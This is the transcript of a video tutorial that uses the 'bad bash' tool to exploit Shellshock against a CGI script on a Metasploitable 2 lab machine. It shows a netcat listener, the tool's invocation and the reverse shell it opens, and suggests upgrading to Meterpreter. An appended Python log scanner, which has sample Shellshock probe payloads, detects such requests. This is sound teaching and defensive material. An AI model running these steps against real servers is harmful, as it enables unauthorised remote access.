Hey guys, in this video I'm gonna show you guys a tool which can be used to exploit Shellshock vulnerabilities within minutes. This is a really powerful tool; it's called bad bash. It's a CVE 2014 exploit tool. The basic version only checks for the HTTP CGI site and provides a Netcat reverse shell on port 1234. There are also other versions which you can use to get more extensive access, but in this case we just need a connection back, a reverse shell, so this will do the job.
The tool is only intended as a proof of concept and has only limited functionality. It uses a delay to check if a system is vulnerable, so if you notice it hanging while you're using it to check a given system, that means you have some patching to do. You can easily install this because it's open source. You can just get it from GitHub; you can just do git clone. The website is HTTPS, just go to github.com.
And then secure us global, I think it was secure us global, and then bad bash; this is where you need to go. When you press enter, you're going to get a clone. I already have it installed, so I'm just going to cut that. I already have bad bash installed; it's really easy to use. All you have to do is run the command for bad bash. Let's first go into the directory and I'll show you guys what is inside.
So we have a Ruby script right here, as you can see, and then just a basic README with directions on how to use it and stuff. And since the clone command downloads an existing git repo, you will be able to find everything that is in there automatically. In the previous videos we have already seen how a cgi-bin script works and how we can use it to get an access point from an external browser. As far as I remember, we did something like a hack.sh script and tried to access it from our local machine.
So we used our target machine, Metasploitable 2, and we saved the script called hack.sh in the CGI path. Then we went to our local machine, which is root Kali, and then we went to the IP address and to that particular path. So let's actually check if it still exists. I already have Metasploitable open, so I'm just going to type ifconfig and check for the IP address. So it's 160 719. Okay, cool.
And we're just going to go back to Kali and check if it's still available. As you can see, this was our older one. Let's see the new one: it says 19210 167 and /cgi-bin/hack.sh. Awesome, so it's still accessible. Now we're going to use this to do our exploitation. Web CGI programs can be written in any language which can process standard input (stdin) and environment variables and write to standard output (stdout), so you can always make use of that. So what exactly was the web server doing over there?
It will interact with all the CGI programs using the Common Gateway Interface (CGI) standard as set by RFC. This is supported by most modern programming languages, including the bash shell, which is a good thing for us because in this case we're going to be exploiting the bash shell. So all that remains is to navigate with our browser, just like I did with the IP address. That's it. Since by default the Apache server is configured to run CGI scripts from that particular directory, the cgi-bin directory, you can always just access it as cgi-bin. You don't have to type the entire thing, /usr/lib/cgi-bin; you just type cgi-bin, the way we accessed it before.
So now what we want to do is start up a listener on our Kali Linux machine, which is our attacker machine, and try to get a connection. Let's do it by just typing nc -lvp and then our port. I'm going to be picking 1234, because bad bash automatically has it set up to make a TCP connection back on port 1234, so I'm going to do the same thing. I'm going to open up a listener and see if there's any action happening in the background.
Is there any banner grabbing happening? Now just press enter and open up another shell. Now we're going to use our bad bash script, which is a Ruby script. Since it's a Ruby script, let me show you; I'm going to be using this particular thing right here. Just type ruby badbash.rb, then -t for our target machine, which was 192... our Metasploitable 2 machine, 1921680 167 as I remember, and then our path. Like I said, we don't have to type that entire thing, /usr/lib/cgi-bin and everything; you can just type cgi-bin and our script's name, which was hack.sh. And then close it up.
And then we're gonna put our destination, -t, which is our local machine. So let's see what our Kali Linux IP is. It's 168. Okay, cool. So 192168, that's our destination IP, and then close it up. Well, I didn't open it, so open it and then close it in hyphens, and just press enter. If it is vulnerable, then it will show you that the target is vulnerable. Just wait for a minute.
Check. Perfect, so as you can see, it connected to our local machine from Metasploitable 2, and as you can see here, the target is vulnerable. So it literally took less than five minutes to do this particular thing, literally less than three minutes with this tool. So it's a really efficient tool; you don't have to worry about sending an HTTP request or using the Metasploit Framework. You can directly do it from your Kali just by installing this, and it's highly likely that it's going to work. So we can check the id, you can check the IP address of our root. Now for the Metasploitable 2 machine, in case it is working, then it should be on 67, which is our target machine. So that's it.
That's one simple way to do it. And if you guys want to get the Meterpreter shell on it, like I said in the first video, you can always upgrade your normal command shell, which is this right here, to a Meterpreter shell. So you can use a simple tool and then expand it the way you want to. Well, I hope you enjoyed this video. We'll see you in the next one.
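From the defender's side, the attack described in the video reaches the server as an HTTP request whose header values are turned into CGI environment variables, so the Shellshock function-definition marker `() {` ends up in the web server's access log. The following Python checker is an added example (not part of the video or the bad bash tool) that scans Apache combined-format log lines for that marker in the request line, Referer and User-Agent; the log lines are constructed for the example.

```python
import re
from typing import Dict, List, Optional

# Apache "combined" log format:
#   host ident user [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Every Shellshock payload begins with an exported bash function definition,
# "() {" with optional whitespace, so matching that prefix covers the whole
# family rather than the output of one particular tool.
SHELLSHOCK_RE = re.compile(r'\(\)\s*\{')

def parse_combined(line: str) -> Optional[Dict[str, str]]:
    """Parse one combined-format line; return None if it does not match."""
    m = COMBINED_RE.match(line.strip())
    return m.groupdict() if m else None

def shellshock_hits(line: str) -> List[str]:
    """Names of the logged fields that carry the marker. Only fields that the
    web server exports to a CGI script are checked: request (REQUEST_URI and
    QUERY_STRING), referer (HTTP_REFERER) and agent (HTTP_USER_AGENT)."""
    rec = parse_combined(line)
    if rec is None:
        return []
    return [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(rec[f])]

def scan(lines: List[str]) -> List[Dict[str, object]]:
    """One finding per suspicious line: source host, requested path, fields hit, status."""
    findings = []
    for line in lines:
        fields = shellshock_hits(line)
        if fields:
            rec = parse_combined(line)
            parts = rec["request"].split(" ")
            path = parts[1] if len(parts) > 1 else rec["request"]
            findings.append({"host": rec["host"], "path": path, "fields": fields, "status": rec["status"]})
    return findings

# Constructed sample lines: a benign request to a CGI script, a probe carried in
# the User-Agent header, and a probe carried in the Referer header.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /cgi-bin/hack.sh HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /cgi-bin/hack.sh HTTP/1.1" 200 0 "-" "() { :;}; echo probe"',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /cgi-bin/hack.sh HTTP/1.1" 500 0 "() { :;}; echo probe" "curl/7.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} -> {f['path']} via {','.join(f['fields'])} (status {f['status']})")
```

The combined format only records Referer and User-Agent, so a payload sent in any other header (Cookie, Host, a custom header) is invisible here; full-header logging or a web application firewall log is needed to cover those.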